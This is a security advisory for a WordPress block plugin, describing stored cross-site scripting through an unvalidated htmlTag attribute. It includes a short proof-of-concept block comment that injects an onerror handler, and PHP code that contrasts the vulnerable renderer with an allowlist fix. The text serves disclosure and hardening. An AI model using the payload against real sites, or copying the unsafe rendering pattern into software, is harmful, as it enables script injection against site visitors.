Description
The plugin does not validate the htmlTag option in several of its blocks before outputting it back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
As a contributor, put the code below in a post while in Code Editor mode:
<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->
The XSS will be triggered when any user (pre)views the post.
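The missing check, shown as an added example that is not the plugin's own code: a renderer that concatenates htmlTag into the tag position, next to one that accepts only an exact allowlist match. The function names, the class attribute and the allowlist are assumptions made for illustration; the block attributes are the ones from the proof of concept above.

```php
<?php
// Added example. Function names and the allowlist are hypothetical,
// not taken from the plugin's source.

// Tag names a title block could reasonably render as (assumed allowlist).
const ALLOWED_TITLE_TAGS = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'span', 'div'];

// Vulnerable pattern: the attribute value lands in the tag position as-is,
// so anything after the first space becomes attributes of the element.
function render_title_unsafe(array $attrs, string $title): string
{
    $tag = $attrs['htmlTag'] ?? 'h2';
    return "<{$tag} class=\"guten-post-title\">" . htmlspecialchars($title) . "</{$tag}>";
}

// Hardened pattern: only an exact allowlist match is ever used as a tag name;
// non-strings and unknown values fall back to the default.
function sanitize_html_tag($value, string $default = 'h2'): string
{
    if (!is_string($value)) {
        return $default;
    }
    $tag = strtolower(trim($value));
    return in_array($tag, ALLOWED_TITLE_TAGS, true) ? $tag : $default;
}

function render_title_safe(array $attrs, string $title): string
{
    $tag = sanitize_html_tag($attrs['htmlTag'] ?? null);
    // Inside WordPress, esc_html() would take the place of htmlspecialchars().
    return "<{$tag} class=\"guten-post-title\">"
        . htmlspecialchars($title, ENT_QUOTES, 'UTF-8')
        . "</{$tag}>";
}

// Block attributes from the proof of concept on this page.
$attrs = json_decode(
    '{"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"}',
    true
);

echo render_title_unsafe($attrs, 'Hello'), PHP_EOL;           // event handler reaches the markup
echo render_title_safe($attrs, 'Hello'), PHP_EOL;             // falls back to the default tag
echo render_title_safe(['htmlTag' => 'H3'], 'Hello'), PHP_EOL; // legitimate value is normalised
```

Escaping the value is not sufficient in the tag position, because a payload with no quotes or angle brackets survives it unchanged; the allowlist is what removes the injected attributes.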